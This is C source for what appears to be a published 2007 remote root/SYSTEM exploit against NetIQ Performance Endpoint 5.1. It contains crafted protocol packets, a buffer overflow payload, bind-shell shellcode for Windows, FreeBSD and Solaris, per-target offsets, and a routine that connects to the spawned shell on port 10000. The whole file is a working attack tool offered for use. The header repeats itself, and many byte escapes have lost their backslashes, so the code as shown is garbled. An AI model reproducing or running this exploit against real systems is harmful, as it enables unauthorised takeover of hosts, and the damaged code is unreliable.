/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.c /*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
* by mu-b - Jun 2007
*
* $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
*
* - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15541 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15368 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1 (win32)
* NetIQ Performance Endpoint 4.2 (freebsd-x86)
* NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
* (Revised: May 23, 2006)
*
*
* "No executable code (like Java or Visual Basic) is sent. There is no way
* to do something like 'run this command.' 100,000’s of endpoints have been
* installed worldwide without incident."
*
* "Endpoints do rigorous internal validation. For example, endpoints are not
* susceptible to 'buffer overrun' attacks used by hackers."
* - https://tinyurl.com/lgmblyj
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/

#include <stdio.h>
#include <stdlib.h>

#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define IPV4_BUFLEN 16 /* "255.255.255.255" */

#define PORT_SHELL 10000
#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388

static char ppkt_buf1[] =
"x06" /* ENDPT_COMMAND_SETUP_E1 */
"x07x14x43x1A" /* verify_get_id (1) */
"x00x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"x00x03" /* */
"xff" /* code_convert_from_line */
"x00x03" /* */
"xff" /* code_convert_from_line */
"x00" /* */
"x00x02" /* len < 0x80 */
"x00x03" /* len < 0x40 */
"x00" /* len < 0x40 */
"x41x41x41x41x41x41x41x41" /* */
"x41x41x41x41x41x41x41x41" /* */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x41x41x41x41x41x41" /* */
"x00x00x00x01" /* */
"x00x00x00x02" /* 218h */
"x00" /* */
"x01" /* 1ACh */
"x00x00" /* */
"x00" /* 254h */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00"; /* */

static char ppkt_buf1_end[] =
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00"; /* */

static char ppkt_buf2[] =
"x06" /* ENDPT_COMMAND_SETUP_E1 */
"x07x14x43x1A" /* verify_get_id (1) */
"x00x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"x00x03" /* */
"xff" /* code_convert_from_line */
"x00x03" /* */
"xff" /* code_convert_from_line */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x69" /* 210h */
"x00x00x00x69" /* var_C */
"x00x02" /* */
"x00x00x00x69" /* var_C */
"x00x00x00x69" /* 218h */
"x69" /* */
"x01" /* 1ACh */
"x00x00" /* */
"x69" /* 254h */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00"; /* */

static char ppkt_buf2_end[] =
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x69" /* 0A8h */
"x00x03" /* len < 0x40 */
"x00"; /* */

static char cpkt_buf1[] =
"x07"
"AAAA";

static char cpkt_buf2[] =
"x38"
"x00x04"
"AAAA";

static char x86_evil_len[] =
"x11xc0"; /* adc eax, eax */

#define X86_NOP_BYTE 0x90 /* nop */

static char sparc_evil_len[] =
"x10x80x00x3c"; /* ba */

static char sparc_nop[] =
"x01x00x00x00"; /* nop */

static char hammer_buf[] =
"x00x25x38"
"x00x20"
"x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00";

static char win32_x86_bind[] =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x8e"
"x2bxb7x2ax83xebxfcxe2xf4x72x41x5cx67x66xd2x48xd5"
"x71x4bx3cx46xaax0fx3cx6fxb2xa0xcbx2fxf6x2ax58xa1"
"xc1x33x3cx75xaex2ax5cx63x05x1fx3cx2bx60x1ax77xb3"
"x22xafx77x5ex89xeax7dx27x8fxe9x5cxdexb5x7fx93x02"
"xfbxcex3cx75xaax2ax5cx4cx05x27xfcxa1xd1x37xb6xc1"
"x8dx07x3cxa3xe2x0fxabx4bx4dx1ax6cx4ex05x68x87xa1"
"xcex27x3cx5ax92x86x3cx6ax86x75xdfxa4xc0x25x5bx7a"
"x71xfdxd1x79xe8x43x84x18xe6x5cxc4x18xd1x7fx48xfa"
"xe6xe0x5axd6xb5x7bx48xfcxd1xa2x52x4cx0fxc6xbfx28"
"xdbx41xb5xd5x5ex43x6ex23x7bx86xe0xd5x58x78xe4x79"
"xddx78xf4x79xcdx78x48xfaxe8x43x90x3axe8x78x3excb"
"x1bx43x13x30xfexecxe0xd5x58x41xa7x7bxdbxd4x67x42"
"x2ax86x99xc3xd9xd4x61x79xdbxd4x67x42x6bx62x31x63"
"xd9xd4x61x7axdax7fxe2xd5x5exb8xdfxcdxf7xedxcex7d"
"x71xfdxe2xd5x5ex4dxddx4exe8x43xd4x47x07xcexddx7a"
"xd7x02x7bxa3x69x41xf3xa3x6cx1ax77xd9x24xd5xf5x07"
"x70x69x9bxb9x03x51x8fx81x25x80xdfx58x70x98xa1xd5"
"xfbx6fx48xfcxd5x7cxe5x7bxdfx7axddx2bxdfx7axe2x7b"
"x71xfbxdfx87x57x2ex79x79x71xfdxddxd5x71x1cx48xfa"
"x05x7cx4bxa9x4ax4fx48xfcxdcxd4x67x42x61xe5x57x4a"
"xddxd4x61xd5x5ex2bxb7x2a";

static char freebsd_x86_bind[] =
"x6ax61x58x99x52x68x10x02x27x10x89xe1x52x42x52x42"
"x52x6ax10xcdx80x99x93x51x53x52x6ax68x58xcdx80xb0"
"x6axcdx80x52x53x52xb0x1excdx80x97x6ax02x59x6ax5a"
"x58x51x57x51xcdx80x49x79xf5x50x68x2fx2fx73x68x68"
"x2fx62x69x6ex89xe3x50x54x53x53xb0x3bxcdx80";

static char solaris_sparc_bind[] =
"x9cx2bxa0x07x98x10x20x01x96x1axc0x0bx94x1axc0x0b"
"x92x10x20x02x90x10x20x02x82x10x20xe6x91xd0x20x08"
"xd0x23xbfxf8x21x00x00x89xa0x14x23x10xe0x23xbfxf0"
"xc0x23xbfxf4x92x23xa0x10x94x10x20x10x82x10x20xe8"
"x91xd0x20x08xd0x03xbfxf8x92x10x20x01x82x10x20xe9"
"x91xd0x20x08xd0x03xbfxf8x92x1ax40x09x94x12x40x09"
"x82x10x20xeax91xd0x20x08xd0x23xbfxf8x94x10x20x03"
"x92x10x20x09x94xa2xa0x01x82x10x20x3ex91xd0x20x08"
"x12xbfxffxfcxd0x03xbfxf8x94x1axc0x0bx21x0bxd8x9a"
"xa0x14x21x6ex23x0bxdcxdax90x23xa0x10x92x23xa0x08"
"xe0x3bxbfxf0xd0x23xbfxf8xc0x23xbfxfcx82x10x20x3b"
"x91xd0x20x08";

static char solaris_x86_bind[] =
"xb8xffxffxffxffxbaxfdxffxd8xefxf7xd0xf7xd2x50x52"
"x89xe7x31xdbxf7xe3xb0x02x50x52x52x50x50x50xb0xe6"
"xcdx91x93x6ax10x57x53x52xb0xe8xcdx91x52x53x52xb0"
"xe9xcdx91x52x53x6ax02xb0xeaxcdx91x93x92x99x59x51"
"x52xb0x06xcdx91x51x6ax09x53x52xb0x3excdx91x83xc4"
"x18x49x79xebx52x68x2fx2fx73x68x68x2fx62x69x6ex89"
"xe3x52x53x89xe1x52x52x51x53x52xb0x3bxcdx91";

#define NUM_TARGETS 7

#define ARCH_X86 0
#define ARCH_SPARC 1

struct target_t
{
const char *name;
const char *zshell;
const int zshell_len;
const int zshell_pkt_len;
const int fp_indx;
const int fp_offset;
const int arch;
};

struct target_t targets[] = {
{ "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - FreeBSD (universal)",
freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
{ "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
{0}
};

static const char *quotes[] = {
" "No executable code (like Java or Visual Basic) is sent. There is no way "
" to do something like 'run this command.' 100,000’s of endpoints have been "
" installed worldwide without incident."",
" "Endpoints do rigorous internal validation. For example, endpoints are not "
" susceptible to 'buffer overrun' attacks used by hackers.""
};

static int verbose = 1; /* verbosity */
static int ppid, cpid; /* parent and child process id's */

static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);

static void
fatal (void)
{
kill (0, SIGKILL);
exit (EXIT_FAILURE);
}

static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
struct ifaddrs *ifa_head;
int result;

result = -1;
if (getifaddrs (&ifa_head) == 0)
{
struct ifaddrs *ifa_cur;

for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{
if (ifa_cur->ifa_addr->sa_family != AF_INET ||
!(ifa_cur->ifa_flags & IFF_UP))
continue;
if (ifa_cur->ifa_flags & IFF_LOOPBACK)
continue;

memcpy (ip_addr,
&((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
sizeof *ip_addr);
result = 0;
break;
}
}

freeifaddrs (ifa_head);
}

return (result);
}

static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
perror ("send()");
exit (EXIT_FAILURE);
}

return (n);
}

static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
perror ("recv()");
exit (EXIT_FAILURE);
}

return (n);
}

static int
sock_recv_str (int fd, char *dst, int len)
{
int n = sock_recv (fd, dst, len - 1);
dst[n] = '';
return (n);
}

static void
shellami (int fd)
{
int n;
fd_set rset;
char rbuf[1024];

while (1)
{
FD_ZERO (&rset);
FD_SET (fd, &rset);
FD_SET (STDIN_FILENO, &rset);

if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
{
perror ("select()");
fatal ();
}

if (FD_ISSET (fd, &rset))
{
if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
{
fprintf (stderr, "Connection closed by foreign host. ");
exit (EXIT_SUCCESS);
}
printf ("%s", rbuf);
fflush (stdout);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
{
rbuf[n] = '';
sock_send (fd, rbuf, n);
}
}
}
}

static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;

fflush (stdout);
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}

if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}

memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);

if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
perror ("connect()");
return (-1);
}

return (fd);
}

int
endpt_add_string (char *buf, char *str)
{
unsigned int str_len;
unsigned short str_lens;

assert (buf != NULL && str != NULL);

str_len = 2 + strlen (str) + 1;
str_lens = htons (str_len);

/* add the string length and copy, including NULL */
*((unsigned short *) buf) = str_lens;
memcpy (buf + 2, str, str_len - 2);

return (str_len);
}

char *
endpt_read_packet (int fd, char *buf)
{
unsigned short pkt_len;
int n;

n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len);
if (n < 2)
{
fprintf (stderr, "endpt_read_packet: failed reading length! ");
return (NULL);
}

pkt_len = ntohs (pkt_len);
if (pkt_len > ENDPT_PKTMAX)
{
fprintf (stderr, "endpt_read_packet: invalid packet length! ");
return (NULL);
}

n = sock_recv (fd, buf, pkt_len - 2);
if (n < pkt_len - 2)
{
fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)! ", n, pkt_len);
return (NULL);
}

return (buf);
}

char *
endpt_create_packet (char *buf, unsigned int len)
{
char *pkt_buf;
unsigned int pkt_len;
unsigned short pkt_lens;

assert (buf != NULL && len > 0);
assert (len <= UINT_MAX - 2);
assert (len <= ENDPT_PKTMAX - 2);

pkt_len = 2 + len;
pkt_buf = malloc (pkt_len * sizeof (char));
if (pkt_buf == NULL)
return (NULL);

pkt_lens = htons (pkt_len);

/* add the packet length and copy */
*((unsigned short *) pkt_buf) = pkt_lens;
memcpy (pkt_buf + 2, buf, len);

return (pkt_buf);
}

void
endpt_listen_child (char *thost, struct target_t *trgt)
{
struct sockaddr_in servaddr, cliaddr;
char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
unsigned int var_30_ptr;
int lfd, cfd, sfd, pid;
socklen_t clilen;

sleep (1);
pid = getpid ();

if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
fatal ();
}

memset (&servaddr, 0, sizeof servaddr);
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
servaddr.sin_port = htons (ENDPT_TCP_PORT);

if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0)
{
perror ("bind()");
fatal ();
}

if (listen (lfd, 2) < 0)
{
perror ("listen()");
fatal ();
}

clilen = sizeof cliaddr;
if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0)
{
perror ("accept()");
fatal ();
}

printf ("[child-%d] connection accepted from %s:%d ",
pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port));

printf ("[child-%d] reading first packet...", pid);

/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done ");

printf ("[child-%d] sending first reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1);

sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2);
free (pkt_ptr);
printf ("done ");

printf ("[child-%d] reading second packet...", pid);

/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done ");

printf ("[child-%d] reading third packet...", pid);

if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done ");

printf ("[child-%d] MAGIC COOKIE: 0x%08x ", pid, var_30_ptr);

memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

printf ("[child-%d] reading fourth packet...", pid);

/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done ");

printf ("[child-%d] reading fifth packet...", pid);

if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done ");

printf ("[child-%d] MAGIC COOKIE: 0x%08x ", pid, var_30_ptr);

memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

printf ("[child-%d] sending second reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1);

sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2);
free (pkt_ptr);
printf ("done ");

printf ("[child-%d] sending evil buffer...", pid);

ptr = pkt_buf;
if (trgt->arch == ARCH_X86)
{
memcpy (ptr, x86_evil_len, sizeof x86_evil_len);
ptr += sizeof x86_evil_len - 1;
memset (ptr, X86_NOP_BYTE, 0x11c0 - 2);
}
else if (trgt->arch == ARCH_SPARC)
{
int i;

for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1)
memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len);

for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1)
memcpy (ptr, sparc_nop, sizeof sparc_nop);
}
else
{
fprintf (stderr, "opps ");
exit (EXIT_FAILURE);
}

memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1);
sock_send (cfd, pkt_buf, trgt->zshell_pkt_len);
printf ("done ");

printf ("[child-%d] sending hammer buffer...", pid);

ptr = pkt_buf;
memcpy (ptr, hammer_buf, sizeof hammer_buf);
memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr);
if (trgt->arch == ARCH_SPARC)
var_30_ptr = ntohl (var_30_ptr);

var_30_ptr -= trgt->fp_offset - 0x08;

if (trgt->arch == ARCH_SPARC)
var_30_ptr = htonl (var_30_ptr);

memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr);
sock_send (cfd, pkt_buf, sizeof hammer_buf - 1);
printf ("done ");

printf ("[child-%d] waiting for the shellcode to be executed... ", pid);
sleep (3);
if ((sfd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t! ");
shellami (sfd);
}

sleep (1);
close (cfd);
}

void
endpt_parent (char *thost)
{
struct in_addr ip_addr;
char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
int fd;

get_localip_getifaddrs (&ip_addr.s_addr);
strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf);
ip_buf[sizeof ip_buf - 1] = '';

if (verbose)
fprintf (stderr, "[parent-%d] source address %s ", ppid, ip_buf);

fflush (stdout);

printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT);
if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0)
fatal ();
printf ("done ");

printf ("[parent-%d] building first packet...", ppid);

ptr = pkt_buf;
memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1);
ptr += sizeof ppkt_buf1 - 1;

/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);

memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end);
ptr += sizeof ppkt_buf1_end - 1;

pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done ");

sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);

printf ("[parent-%d] building second packet...", ppid);

ptr = pkt_buf;
memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2);
ptr += sizeof ppkt_buf2 - 1;

/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);

memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end);
ptr += sizeof ppkt_buf2_end - 1;

pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done ");

sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);

printf ("[parent-%d] building third packet...done ", ppid);
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);

sleep (2);
printf ("[parent-%d] closing socket...done ", ppid);
close (fd);
}

int
main (int argc, char **argv)
{
struct target_t *trgt;
int i, cret;

printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit "
"by: <mu-b@digit-labs.org> "
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$! ");

if (argc <= 2)
{
fprintf (stderr, "Usage: %s <host> <target> ", argv[0]);

for (i = 0; targets[i].name; i++)
fprintf (stderr, " %d) %s ", i, targets[i].name);
fprintf (stderr, " ");

exit (EXIT_SUCCESS);
}

if (atoi (argv[2]) >= NUM_TARGETS)
{
fprintf (stderr, "Only %d targets known!! ", NUM_TARGETS);
exit (EXIT_SUCCESS);
}

trgt = &targets[atoi (argv[2])];
printf ("Target: %s ", trgt->name);

srand (time (NULL));
printf ("%s - https://tinyurl.com/lgmblyj ", quotes[rand() & 1]);

ppid = getpid ();
if ((cpid = fork ()) < 0)
{
perror ("fark()");
exit (EXIT_FAILURE);
}
else if (cpid == 0)
{
/* child */
endpt_listen_child (argv[1], trgt);
exit (EXIT_SUCCESS);
}

/* parent */
endpt_parent (argv[1]);

/* wait for child */
wait (&cret);
if (verbose)
fprintf (stderr, "[parent-%d] child-%d exited %d ", ppid, cpid, cret);

return (EXIT_SUCCESS);
}